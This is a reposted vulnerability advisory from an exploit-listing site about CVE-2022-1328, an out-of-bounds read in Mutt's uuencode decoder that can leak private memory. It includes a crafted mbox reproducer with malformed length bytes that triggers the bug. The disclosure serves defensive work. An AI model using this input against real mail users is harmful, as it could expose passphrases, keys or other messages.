Advertisement






Mutt mutt_decode_uuencoded() Memory Disclosure

CVE Category Price Severity
CVE-2022-1328 CWE-125 $1000 Critical
Author Risk Exploitation Type Date
AbdulAziz Hariri High Local 2022-07-11
CVSS
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022070030

Below is a copy:

Mutt mutt_decode_uuencoded() Memory Disclosure
mutt: mutt_decode_uuencoded() can read the past the of the input line

In mutt_decode_uuencoded(), the line length is read from the untrusted uuencoded part without validation. This could result in including private memory in replys, for example fragments of other messages, passphrases or keys.

Reproduce with the following mbox, note that these are literal 0x9f bytes. This should show some uninitialized garbage in the message.

From taviso  Thu Mar 31 16:53:55 2022
From: taviso
Subject: mutt_decode_uuencoded test
Content-Disposition: inline
Content-Transfer-Encoding: x-uuencode
Content-Type: text/plain

begin 644 test
<9f>
M2&5L;&\\L\"@I)9B!Y;W4@87)E(')E861I;F<@=&AI<R!M97-S86=E(&EN(&UU
M='0L('1H92!N97AT(&QI;F4*<VAO=6QD(&-O;G1A:6X@9V%R8F%G92X*\"@H*
<9f>
54&QE87-E(')E<&QY+`I4879I<RX*
`
end.



This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is YYYY-MM-DD.


Related CVE Numbers: CVE-2022-1328.



Found by: [email protected]

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.